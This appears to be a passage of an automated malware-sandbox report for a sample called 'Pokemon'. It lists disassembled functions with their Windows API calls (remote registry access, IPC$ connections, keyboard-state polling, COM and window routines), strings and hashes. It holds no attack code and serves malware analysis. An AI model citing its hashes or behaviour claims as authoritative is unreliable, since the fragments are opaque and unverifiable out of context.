                                                                                                                                                                                                                                                                                      • Opcode ID: 3be1de2291b58869fcefd02b395c872de43ce84d27230f4c28aa4940ba956587
                                                                                                                                                                                                                                                                                      • Instruction ID: af869d8be25366f9aca051fbe1c8bed73822332e270b483eb027d4829f759569
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3be1de2291b58869fcefd02b395c872de43ce84d27230f4c28aa4940ba956587
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D841307290010DAACF15EBE0EE86DEEB778AF19300F500065F605B6493EB756F49EB61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000F1093
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000F10AF
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000F10CB
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000F10F5
                                                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 000F111D
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000F1128
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000F112D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                      • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                      • Opcode ID: f54a4d6d9c5e20bd5edf24b7f3b1f8e992aedd0efa1f48b85667f7ec488c8cc7
                                                                                                                                                                                                                                                                                      • Instruction ID: 41fb59f5e445f7251d3132efa9dc03ea5653805ad98a87becfd80c292c12c068
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f54a4d6d9c5e20bd5edf24b7f3b1f8e992aedd0efa1f48b85667f7ec488c8cc7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44410672C1022DEBCF21EBA4EC85DEEB7B8BF04750F404129E901A3561EB719E49DB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00124AD9
                                                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00124AE0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00124AF3
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00124AFB
                                                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00124B06
                                                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00124B10
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00124B1A
                                                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00124B30
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00124B3C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                      • Opcode ID: 71f043c37bc5dd6fcea364bb1cdf4a621dcb3ca62037952e5360b52174dfa9d6
                                                                                                                                                                                                                                                                                      • Instruction ID: 38f58aa3afda986a41b38c85733391217bf3260685b4cefb1feb1094b8ace045
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71f043c37bc5dd6fcea364bb1cdf4a621dcb3ca62037952e5360b52174dfa9d6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5316D32100225BBDF229FA4EC08FDA3BA9FF0D364F110215FA15A61A0C775D8B1DB94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 001146B9
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 001146E7
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 001146F1
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011478A
                                                                                                                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0011480E
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00114932
                                                                                                                                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0011496B
                                                                                                                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00130B64,?), ref: 0011498A
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 0011499D
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00114A21
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00114A35
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fc0340dedd5d15a10cadd2ef985057eed3522db2f6b837ceb8d786fbced6d1f3
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a62795f0a5f549ac73df1c8fa7fcbf19536665cfe76a31a409bfb1c9f567cf9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc0340dedd5d15a10cadd2ef985057eed3522db2f6b837ceb8d786fbced6d1f3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90C16871608305AFD704DF68C8849ABB7E9FF89B48F10492DF9899B251D730ED86CB52
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00108538
                                                                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001085D4
                                                                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 001085E8
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00130CD4,00000000,00000001,00157E8C,?), ref: 00108634
                                                                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001086B9
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00108711
                                                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0010879C
                                                                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001087BF
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 001087C6
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0010881B
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00108821
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 541140bafdb215276d5b9883535dad4980ed20993e35748b01d7ec9179fd8e30
                                                                                                                                                                                                                                                                                      • Instruction ID: 35c0376dc15d55230331b961583e4717e28b2972cd12694bd7f5b6afb5cdbf2e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 541140bafdb215276d5b9883535dad4980ed20993e35748b01d7ec9179fd8e30
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DC12975A00105AFCB14DFA4C888DAEBBF5FF48304B148099F55AAB262DB70ED46CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 000F039F
                                                                                                                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 000F03F8
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000F040A
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 000F042A
                                                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 000F047D
                                                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 000F0491
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000F04A6
                                                                                                                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 000F04B3
                                                                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F04BC
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000F04CE
                                                                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F04D9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c3846bef3a63a46ae7caef3e48dd0ee21845d6e8190ab7b54d0221d5b3f87d6c
                                                                                                                                                                                                                                                                                      • Instruction ID: 22512091e14d54782bc8c91c6273dba543d80f8ee85adf3764868703189dd83f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3846bef3a63a46ae7caef3e48dd0ee21845d6e8190ab7b54d0221d5b3f87d6c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE415175A00219EFCF10EF94D8449ED7BB9FF48344F008065EA45A7A62C730B946DB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FA65D
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 000FA6DE
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 000FA6F9
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 000FA713
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 000FA728
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 000FA740
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 000FA752
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 000FA76A
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 000FA77C
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 000FA794
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 000FA7A6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1aee81f19e05997eb323fe788ac624780138376998b42be823502bfa196c02e5
                                                                                                                                                                                                                                                                                      • Instruction ID: d69c0ac51ca5710573cfbea7da097ec84842f647ac4edafb72750afc32ef5096
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aee81f19e05997eb323fe788ac624780138376998b42be823502bfa196c02e5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 624197A47087CD6EFFB1666088047B5BEF06B17344F088059D7CA96EC2DB9899C4D763
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                      • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32 ref: 001141D1
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 001141DC
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00130B44,?), ref: 00114236
                                                                                                                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 001142A9
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00114341
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00114393
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00108C9C
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00108CAC
                                                                                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00108CB8
                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00108D55
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108D69
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108D9B
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00108DD1
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108DDA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateMenu.USER32 ref: 00124715
                                                                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00124724
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001247AC
                                                                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 001247C0
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 001247CA
                                                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001247F7
                                                                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 001247FF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                      • String ID: 0$F
                                                                                                                                                                                                                                                                                      • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 000F28B1
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 000F28BC
                                                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 000F28D8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F28DB
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 000F28E4
                                                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 000F28F8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F28FB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e0b9718cfd6a645266c8ac6cf08e9e15f48c618a2ddc1a00ddfe3f5c315be3e
                                                                                                                                                                                                                                                                                      • Instruction ID: a6459711ed45a639ce7d60bc407894628edcbb87d0ef7dbb8ab3dfdcd9a86d7f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e0b9718cfd6a645266c8ac6cf08e9e15f48c618a2ddc1a00ddfe3f5c315be3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21C274900118BBCF10EBA0DC85DFEBBB4EF05360F004116BA61A7292DB794959EB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 000F2990
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 000F299B
                                                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 000F29B7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F29BA
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 000F29C3
                                                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 000F29D7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F29DA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: a70d41ccaf8ffdb7e26c43f1a1b4b53e41d7401c4083153e3641385cee83b11f
                                                                                                                                                                                                                                                                                      • Instruction ID: f8f34a6b98a1ef1ae3b45499ec447a404ff16eba96c94aeca9cc2bf2ac848f67
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a70d41ccaf8ffdb7e26c43f1a1b4b53e41d7401c4083153e3641385cee83b11f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1521D5B5E01118BBCF11EFA0DC85EFEBBB8EF05310F404116BA51A7192DB794959EB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00124539
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0012453C
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00124563
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00124586
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001245FE
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00124648
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00124663
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0012467E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00124692
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001246AF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 977211eca57c6ab4dff64e72de6b55cb7ff544ef3eb31535dea34b7268f3ad8d
                                                                                                                                                                                                                                                                                      • Instruction ID: 6cbdab35d6415a6437ecfaf6cd43d2ca6fba7e265a6e83920d232fbc03cab7ef
